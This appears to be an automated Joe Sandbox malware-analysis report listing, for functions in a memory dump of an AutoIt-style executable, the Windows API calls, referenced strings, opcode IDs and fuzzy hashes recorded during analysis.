                                                          • Opcode ID: e129cd57717c034a681e42fa92cd27122bb3b929c419ea26370807721d626452
                                                          • Instruction ID: 50c6801a6dc29fda70a302e8e7c4a8ccb6e4a4dc029e58f6aa21d0f02c2cc206
                                                          • Opcode Fuzzy Hash: e129cd57717c034a681e42fa92cd27122bb3b929c419ea26370807721d626452
                                                          • Instruction Fuzzy Hash: AA71AD75A00229DFCB14DFA4D484A9EBBF0FF09310F448499E856AB3A2C774ED55CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00187206
                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0018723C
                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0018724D
                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001872CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                          • String ID: DllGetClassObject
                                                          • API String ID: 753597075-1075368562
                                                          • Opcode ID: a16b8239df9c5d46e4759fbc1edb1591412d1b087c8e6a34f9987985219b8825
                                                          • Instruction ID: bdf3c4dddbcf7d111452be0ddfbb10dfc779853fa177bc1d7a32c62e54eaab1c
                                                          • Opcode Fuzzy Hash: a16b8239df9c5d46e4759fbc1edb1591412d1b087c8e6a34f9987985219b8825
                                                          • Instruction Fuzzy Hash: 7F416171604204EFDB15DF94C884A9A7BAAEF44310F2580ADBD05AF29AD7B1DA45CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001B3E35
                                                          • IsMenu.USER32(?), ref: 001B3E4A
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001B3E92
                                                          • DrawMenuBar.USER32 ref: 001B3EA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$DrawInfoInsert
                                                          • String ID: 0
                                                          • API String ID: 3076010158-4108050209
                                                          • Opcode ID: 117e53a94864b2ee867d23f1af83409203153a3a63434b5473848ba5ad6f9b09
                                                          • Instruction ID: 84a25df85878132cc9f898b0b9a6f7acf7b9295fb51e30a3f02389df2aae7859
                                                          • Opcode Fuzzy Hash: 117e53a94864b2ee867d23f1af83409203153a3a63434b5473848ba5ad6f9b09
                                                          • Instruction Fuzzy Hash: 57413A75A01209EFDB10DF50D884AEABBB5FF49354F04412AF915AB250D730EE65CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                            • Part of subcall function 00183CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00183CCA
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00181E66
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00181E79
                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00181EA9
                                                            • Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_wcslen$ClassName
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 2081771294-1403004172
                                                          • Opcode ID: b56a8fa345c12bf35eb2a41d3914fb3767754c837872e5d66815368a89abef43
                                                          • Instruction ID: 571a4f7e4c7c4da3979b06cbc76dcaf9b2246036780552d044c1b6102a7d1775
                                                          • Opcode Fuzzy Hash: b56a8fa345c12bf35eb2a41d3914fb3767754c837872e5d66815368a89abef43
                                                          • Instruction Fuzzy Hash: C021F372A00108BADB19AB68EC45CFFB7BDEF55350F144129F825A72E1DB744A1A9B20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                          • API String ID: 176396367-4004644295
                                                          • Opcode ID: 2082e093fb66590620f7bafc71e1e9276d25ed8ae5344e44c92f2a9b8c5b51b7
                                                          • Instruction ID: a7423c48ab2e23928a52a7194574ace0a2b352fb31f55865f9a9a88d3ba965dd
                                                          • Opcode Fuzzy Hash: 2082e093fb66590620f7bafc71e1e9276d25ed8ae5344e44c92f2a9b8c5b51b7
                                                          • Instruction Fuzzy Hash: C031047BA0056E8BDB20DF6DD9401BE3391ABB7754B054029E845AB284FB70CE81D3E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001B2F8D
                                                          • LoadLibraryW.KERNEL32(?), ref: 001B2F94
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001B2FA9
                                                          • DestroyWindow.USER32(?), ref: 001B2FB1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                          • String ID: SysAnimate32
                                                          • API String ID: 3529120543-1011021900
                                                          • Opcode ID: 24135a5a52f74ae398adf0c1d0425efae8d000c8650bb23ead5728924af2825b
                                                          • Instruction ID: 9a30b900fede6ad7fd1306e9d9bbe8b7a5b206036e2f0acb6fcdf0dc9f9d9b63
                                                          • Opcode Fuzzy Hash: 24135a5a52f74ae398adf0c1d0425efae8d000c8650bb23ead5728924af2825b
                                                          • Instruction Fuzzy Hash: BE218972204209ABEF108FA4DC84EFB77B9EB69364F10462CFA50D61A0D771DC9597A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00144D1E,001528E9,?,00144CBE,001528E9,001E88B8,0000000C,00144E15,001528E9,00000002), ref: 00144D8D
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00144DA0
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00144D1E,001528E9,?,00144CBE,001528E9,001E88B8,0000000C,00144E15,001528E9,00000002,00000000), ref: 00144DC3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 051ac54638685bb241135184f4dc741910cd71665c93bbbdb81e545b05cc43e2
                                                          • Instruction ID: d3949dc42ac2d481bcd4864e7dda109b982d7f1a464bb2f2315ad5a859760564
                                                          • Opcode Fuzzy Hash: 051ac54638685bb241135184f4dc741910cd71665c93bbbdb81e545b05cc43e2
                                                          • Instruction Fuzzy Hash: BEF04F35A40208FBDB159F94DC49BEDBBF9EF58751F0001A8F909A2660CB709A80CAD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryA.KERNEL32 ref: 0017D3AD
                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0017D3BF
                                                          • FreeLibrary.KERNEL32(00000000), ref: 0017D3E5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadProc
                                                          • String ID: GetSystemWow64DirectoryW$X64
                                                          • API String ID: 145871493-2590602151
                                                          • Opcode ID: 9b31e52d83f1e3bf80cf0d45aff857c796cd8ab9deec01ef91f94d10202bf88f
                                                          • Instruction ID: 3bf3fc533d98b5121c44d6e2413e72fb7080ee6e27e9e2b34d7c8442ba7d431c
                                                          • Opcode Fuzzy Hash: 9b31e52d83f1e3bf80cf0d45aff857c796cd8ab9deec01ef91f94d10202bf88f
                                                          • Instruction Fuzzy Hash: BBF055B1801A29DBD3385714AC589AD7334BF10B01F93C258F80EF2056DB60CD8286D2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00124EDD,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124E9C
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00124EAE
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00124EDD,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124EC0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 145871493-3689287502
                                                          • Opcode ID: 241fc4938042e5af496c68284b7041d6ef18bf43ee56514061d2ef769d9bc0b3
                                                          • Instruction ID: e9ec6fbd74094741757da8e77b81c19aa4acf7df8517a3cddb4d8dcf06940247
                                                          • Opcode Fuzzy Hash: 241fc4938042e5af496c68284b7041d6ef18bf43ee56514061d2ef769d9bc0b3
                                                          • Instruction Fuzzy Hash: 14E0CD35A016329BE231172DBC1CB9F6558AF81F627060215FC01F3200DBA4CD4245F4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00163CDE,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124E62
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00124E74
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00163CDE,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124E87
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 145871493-1355242751
                                                          • Opcode ID: ada1513cfb19cd80d0a4868ade1354f744f3d32ec1cd7bd5cb6131f8f269e5ef
                                                          • Instruction ID: f19d664c36e7c8a9079cca8057de6658bc86160c1648ffbea97bd0bca96cc310
                                                          • Opcode Fuzzy Hash: ada1513cfb19cd80d0a4868ade1354f744f3d32ec1cd7bd5cb6131f8f269e5ef
                                                          • Instruction Fuzzy Hash: D9D01235502A3297BA221B297C1CDCF6A18AF85B513060615F915B6124CF64CD5285E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32 ref: 001AA427
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001AA435
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 001AA468
                                                          • CloseHandle.KERNEL32(?), ref: 001AA63D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                          • String ID:
                                                          • API String ID: 3488606520-0
                                                          • Opcode ID: 1a1af6aa2ddd3a991b9fc06612538f9172ee5d8bc49daea81aae42adb754d54f
                                                          • Instruction ID: 0adc1c2b078ee98b2088025ac4f31b96ae4afbe945f4f628c929bf156e5bb0c0
                                                          • Opcode Fuzzy Hash: 1a1af6aa2ddd3a991b9fc06612538f9172ee5d8bc49daea81aae42adb754d54f
                                                          • Instruction Fuzzy Hash: 54A1C075604300AFD720DF28D886F2AB7E1AF98714F54881DF59A9B2D2D7B0EC45CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0018DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0018CF22,?), ref: 0018DDFD
                                                            • Part of subcall function 0018DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0018CF22,?), ref: 0018DE16
                                                            • Part of subcall function 0018E199: GetFileAttributesW.KERNEL32(?,0018CF95), ref: 0018E19A
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0018E473
                                                          • MoveFileW.KERNEL32(?,?), ref: 0018E4AC
                                                          • _wcslen.LIBCMT ref: 0018E5EB
                                                          • _wcslen.LIBCMT ref: 0018E603
                                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0018E650
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                          • String ID:
                                                          • API String ID: 3183298772-0
                                                          • Opcode ID: c90eaa1139fa0fd8d9c3ce21ab1c7b352f0333530b519e3e6fcfda516ba2be4e
                                                          • Instruction ID: a4b3fe3d0353ddb61d058ff30708659affd09483d8023891fe18d341abfafbff
                                                          • Opcode Fuzzy Hash: c90eaa1139fa0fd8d9c3ce21ab1c7b352f0333530b519e3e6fcfda516ba2be4e
                                                          • Instruction Fuzzy Hash: 835153B24083459BC724EBA4DC819DFB3ECAF95340F00492EF589D3191EF74A6888B66
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                            • Part of subcall function 001AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001AB6AE,?,?), ref: 001AC9B5
                                                            • Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001AC9F1
                                                            • Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA68
                                                            • Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA9E
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001ABAA5
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001ABB00
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001ABB63
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 001ABBA6
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 001ABBB3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                          • String ID:
                                                          • API String ID: 826366716-0
                                                          • Opcode ID: 125d9ad0eb834fd756ae14cae83f3ef0fa57683a6fcc788bd1c655624454c5b5
                                                          • Instruction ID: 3ee5665805687f3f7426037c5efe033d9c190c261fa1bebdb163dc2658b9921f
                                                          • Opcode Fuzzy Hash: 125d9ad0eb834fd756ae14cae83f3ef0fa57683a6fcc788bd1c655624454c5b5
                                                          • Instruction Fuzzy Hash: C561AF75208241AFD714DF24C4D0E2ABBE5FF85308F54896CF4998B2A2DB31ED45CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00188BCD
                                                          • VariantClear.OLEAUT32 ref: 00188C3E
                                                          • VariantClear.OLEAUT32 ref: 00188C9D
                                                          • VariantClear.OLEAUT32(?), ref: 00188D10
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00188D3B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType
                                                          • String ID:
                                                          • API String ID: 4136290138-0
                                                          • Opcode ID: 8d46746668c5436a46ac7d1e49e72123558306bb51e1665b171658fc75bff790
                                                          • Instruction ID: c70f869ea1a7633799a6db22acc11b51ee5e8baf13a79fcf7d35cf538cb67b62
                                                          • Opcode Fuzzy Hash: 8d46746668c5436a46ac7d1e49e72123558306bb51e1665b171658fc75bff790
                                                          • Instruction Fuzzy Hash: 7D516BB5A00619EFCB14DF68C894AAAB7F8FF89310B158559F905DB354E730EA12CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00198BAE
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00198BDA
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00198C32
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00198C57
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00198C5F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String
                                                          • String ID:
                                                          • API String ID: 2832842796-0
                                                          • Opcode ID: 995d0735f213c6a75312ccfc0eb748e7f27f8d411742c916ed3fbb5b26e25d80
                                                          • Instruction ID: c78453fbb21f25c139d35608302bd286f8f951be3887052ba9c68abf4037cb8d
                                                          • Opcode Fuzzy Hash: 995d0735f213c6a75312ccfc0eb748e7f27f8d411742c916ed3fbb5b26e25d80
                                                          • Instruction Fuzzy Hash: 7C512B35A002159FCF05DF64D881AAEBBF5FF49314F088498E849AB3A2DB35ED51CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 001A8F40
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 001A8FD0
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 001A8FEC
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 001A9032
                                                          • FreeLibrary.KERNEL32(00000000), ref: 001A9052
                                                            • Part of subcall function 0013F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00191043,?,753CE610), ref: 0013F6E6
                                                            • Part of subcall function 0013F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0017FA64,00000000,00000000,?,?,00191043,?,753CE610,?,0017FA64), ref: 0013F70D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                          • String ID:
                                                          • API String ID: 666041331-0
